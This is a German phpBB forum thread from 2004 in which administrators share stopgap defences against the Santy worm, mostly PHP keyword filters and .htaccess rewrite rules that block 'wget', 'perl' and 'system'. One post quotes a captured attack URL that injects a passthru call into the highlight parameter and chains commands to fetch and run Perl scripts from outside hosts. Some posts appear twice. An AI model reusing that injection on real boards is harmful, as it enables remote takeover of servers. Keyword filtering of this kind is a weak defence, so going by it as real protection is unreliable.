WebWorm generation 4
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
- BraveEagle
- Mitglied
- Beiträge: 1884
- Registriert: 16.01.2003 18:05
- Wohnort: born 2 be a Paelzer
- Kontaktdaten:
- neo18tilidie
- Mitglied
- Beiträge: 56
- Registriert: 23.02.2003 13:47
- Kontaktdaten:
hier ne Lösung:BraveEagle hat geschrieben:man man man wir haben momentan täglich 500-600 angriffe des Wurms. Die sind zwar dank 2.0.11 nicht erfolgreich, aber wenn man andauernd so viele "User" auf dem Board hat und alle in der wietopic.php nervt das schon ein bissel
z.b. in common.php z.B. folgendes eintragen:
Code: Alles auswählen
if (getenv("QUERY_STRING"))
{
$url_check .= "?".getenv("QUERY_STRING");
}
if ( substr_count($url_check, "h4ck3rsbr.net") > 0
|| substr_count($url_check, "v10.com") > 0
|| substr_count($url_check, "var/tmp") > 0
|| substr_count($url_check, "virus.txt") > 0
|| substr_count($url_check, "wget") > 0
|| substr_count($url_check, "perl") > 0
|| substr_count($url_check, ".txt") > 0
|| substr_count($url_check, "system") > 0
)
{
exit;
}
Die versuchten Angriffe (Bsp.: http://www.XXX.De/viewtopic.php?t=1329&rush=echo _START_; cd /var/tmp;wget www.h4ck3rsbr.net/Virus.txt;perl Virus.txt;wget locais.v10.com.br/w;perl w;rm -rf w*;rm -rf Virus*; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 usw.) werden dann einfach per exit Befehl "abgewehrt".
nachteil: alle verwendten Begriffe können dann z.b. bei der Suche Funktion nicht mehr verwendet werden, aber das sollte temporär ne Lösung anbieten...
- larsneo
- Mitglied
- Beiträge: 2622
- Registriert: 07.03.2002 15:23
- Wohnort: schwäbisch gmünd
- Kontaktdaten:
noch einmal:
1) als schutz vor dem santy wurm sollte man bei älteren boards umgehend http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 anwenden - damit (und nur damit!) ist das zugrundeliegende problem behoben und das board ist vor dem grassierenden santy wurm geschützt. aufgrund einiger anderer sicherheitslücken ist eine aktualisierung auf 2.0.11 nichtsdestotrotz dringend zu empfehlen.
2) als schutz vor dem traffic/ressourcenverbrauch aufgrund von anfragen infizierter server kann man folgende .htaccess verwenden: http://www.phpbb.de/viewtopic.php?p=414585#414585
1) als schutz vor dem santy wurm sollte man bei älteren boards umgehend http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 anwenden - damit (und nur damit!) ist das zugrundeliegende problem behoben und das board ist vor dem grassierenden santy wurm geschützt. aufgrund einiger anderer sicherheitslücken ist eine aktualisierung auf 2.0.11 nichtsdestotrotz dringend zu empfehlen.
2) als schutz vor dem traffic/ressourcenverbrauch aufgrund von anfragen infizierter server kann man folgende .htaccess verwenden: http://www.phpbb.de/viewtopic.php?p=414585#414585
- neo18tilidie
- Mitglied
- Beiträge: 56
- Registriert: 23.02.2003 13:47
- Kontaktdaten:
@yks
die stelle (und version) ist eigentlich egal, da die Abfragen unabhängig von anderem Zeugs sind, aber am besten ist natürlich so weit oben wie möglich.
>> klar ist ein update auf die aktuelle Version zu empfehlen, aber sollte eine neue Sicherheitslücke auftreten, kann das obige Script ohne Anpassung bestimmte Angriffe abwehren...
außer es wird die post methode verwendet, d.h. mit forumlaren, da könnte man dann folgendes verwenden:
aber bisher sind solche scripts ja nich so häufig (??)
die stelle (und version) ist eigentlich egal, da die Abfragen unabhängig von anderem Zeugs sind, aber am besten ist natürlich so weit oben wie möglich.
>> klar ist ein update auf die aktuelle Version zu empfehlen, aber sollte eine neue Sicherheitslücke auftreten, kann das obige Script ohne Anpassung bestimmte Angriffe abwehren...
außer es wird die post methode verwendet, d.h. mit forumlaren, da könnte man dann folgendes verwenden:
Code: Alles auswählen
while (list($key, $value) = each($HTTP_POST_VARS))
{
$value = htmlspecialchars(trim(stripslashes($value)));
if ( substr_count($key, "XXX") > 0
{ exit; }
}
Zuletzt geändert von neo18tilidie am 26.12.2004 16:41, insgesamt 2-mal geändert.
ins rootverzeichnis des Forums eine .htaccess legen:
Code: Alles auswählen
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
GreetZ
Cat
Cat
- neo18tilidie
- Mitglied
- Beiträge: 56
- Registriert: 23.02.2003 13:47
- Kontaktdaten:
- Loewenherz
- Mitglied
- Beiträge: 624
- Registriert: 10.02.2003 20:11
- Wohnort: Saarlouis
- Kontaktdaten: